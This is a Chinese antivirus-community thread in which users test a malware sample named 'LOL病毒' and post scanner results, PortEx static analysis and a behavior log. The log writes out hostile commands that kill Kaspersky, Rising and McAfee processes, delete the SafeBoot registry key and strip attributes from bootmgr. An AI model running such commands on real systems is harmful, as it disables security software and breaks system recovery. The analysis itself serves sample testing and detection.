LOL病毒

2813334994

作者ZXU 作者QQ：3136076407
欢迎下载

ZXU

病毒作者前来报道

Kaspersky用户

BDF扫描MISS
行为上除了杠杀软进程之外，还杠了任务管理器，安全模式，反沙箱，反Virtual PC
没有检测到网络行为

浅暮、浅离

卡巴下载拦截！！！

Jerry.Lin

1. VirusTotal Smart Scanner 1.06
   
2. 
   
3. ======================================================================================
   
4. Scan Time:                    2018-10-02-14-22-24
   
5. Scan Duration:                6 seconds
   
6. Scan Target:                  C:\Users\zhong\Downloads\Compressed\VIRUS TEST\卡饭\LOL
   
7. Number of Scan Files:         1
   
8. Number of Infected Files:     1
   
9. 
   
10. engine_threshold_slider       : 80
    
11. upload_check                  : True
    
12. log_check                     : True
    
13. menu_check                    : True
    
14. scan_pe_check                 : True
    
15. grayware_check                : True
    
16. rescan_check                  : False
    
17. black_check                   : True
    
18. white_check                   : True
    
19. crawler_check                 : True
    
20. ======================================================================================
    
21. 
    
22. Threat(s):
    
23. Grayware.Unwanted               sha256: 648f0f124b0a8f7ce30f63ab14adb6b4655c342db91f16410bd6cebf5363d4c1    Path: C:\Users\zhong\Downloads\Compressed\VIRUS TEST\卡饭\LOL\LOL.exe
    

复制代码

BE_HC

Norton Scan MISS

Win10沙箱双击无法打开

------

以下由PortEx-master自动生成：

1. Anomalies
   
2. *********
   
3. 
   
4. * Deprecated Characteristic in COFF File Header: IMAGE_FILE_LINE_NUMS_STRIPPED
   
5. * Deprecated Characteristic in COFF File Header: IMAGE_FILE_LOCAL_SYMS_STRIPPED
   
6. * Optional Header: Default File Alignment is 0x200, but actual value is 0x1000
   
7. * Optional Header: size of initialized data is too large (0x6f000), it should be 0x3b000
   
8. * Import function typical for code injection: SuspendThread may suspend a thread as preparation to write to memory
   
9. * Import function typical for code injection: GlobalGetAtomNameA used for AtomBombing injection
   
10. * Import function typical for code injection: GlobalAddAtomA used for AtomBombing injection
    
11. * Import function typical for code injection: OpenProcess opens a process (check if PROCESS_ALL_ACCESS is set)
    
12. * Import function typical for code injection: Process32First is used to obtain handle to victim process
    
13. * Import function typical for code injection: Process32Next is used to obtain handle to victim process
    
14. * Import function typical for code injection: ResumeThread may resume thread after injection
    
15. * Import function typical for code injection: LoadLibraryA maps module into the address space of the calling process
    
16. * Import function typical for code injection: CreateThread is used to open and execute a thread in the victim process
    
17. * Import function typical for code injection: CreateProcessA creates a process (check if SUSPENDED flag is used)
    
18. * Import function typical for code injection: VirtualAlloc allocates memory
    
19. 
    
20. PEID Signatures
    
21. ***************
    
22. 
    
23. [Microsoft Visual C++ v6.0] bytes matched: 32 at address: 0x79bd5
    
24. pattern:  55 8b ec 6a ff 68 ?? ?? ?? 00 68 ?? ?? ?? 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec ?? 53 56 57 89 65 e8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ff
    
25. 
    
26. Hashes
    
27. ******
    
28. 
    
29. MD5:    f111244e2f4ce3ddea6e4219494c222d
    
30. SHA256: 648f0f124b0a8f7ce30f63ab14adb6b4655c342db91f16410bd6cebf5363d4c1
    
31. 
    
32. Section      Type      Hash Value                                                      
    
33. ---------------------------------------------------------------------------------------
    
34. 1. .text     MD5       0a82d776a24e6d3439abda7c5f52f092                                
    
35.              SHA256    03f07146b84cef1eba5b1c7864595ea562532f71c14579bef04f7bb1897a271a
    
36. 2. .rdata    MD5       c3091fa6dc3e828fb9c008aa3c284003                                
    
37.              SHA256    50e6ffc27b0448b7c145caa0d75282d39fae7afd150b5d262e6527f4aed86a37
    
38. 3. .data     MD5       01f6dd126e5e3b7ec347b366633bbeb3                                
    
39.              SHA256    71402c1b4cefd3753b4c5558a4f2bd8498a4d40ae58f59c204d9c61ff109a933
    
40. 4. .rsrc     MD5       4a77910ac71a73493bff19abfc0bc631                                
    
41.              SHA256    8eb6398ce488d2a02c228783408918f8c48cf070e11ec9a61f0acbedd88fe679

复制代码

a445441

微点拦截

Jirehlov1234

影子下双击被关机，BD无反应

BE_HC

有些行为已省略

---------

结束与卡巴斯基有关的进程
命令行: taskkill /f /im kavsvc.exe
命令行: taskkill /f /im KVXP.kxp

结束与瑞星有关的进程
命令行: taskkill /f /im Rav.exe
命令行: taskkill /f /im Ravmon.exe

结束与McAfee有关的进程
命令行: taskkill /f /im Mcshield.exe
命令行: taskkill /f /im VsTskMgr.exe

删除与安全模式有关的注册表键
命令行: REG DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\ /va /f

修改引导文件文件属性
命令行: attrib c:\bootmgr -a -s -h -r

修改主机名命令行: cmd /c reg add " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ActiveComputerName" /v ComputerName /t reg_sz /d LOL /f >nul 2>nul

疑似修改Tcp参数
命令行: cmd /c reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters" /v "NV Hostname" /t reg_sz /d LOL /f >nul 2>nul
命令行: reg  add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters" /v "NV Hostname" /t reg_sz /d LOL /f

迷惘的执著

刚不小心双击了。。。360拦截了，吓死了

歌德塔大蜘蛛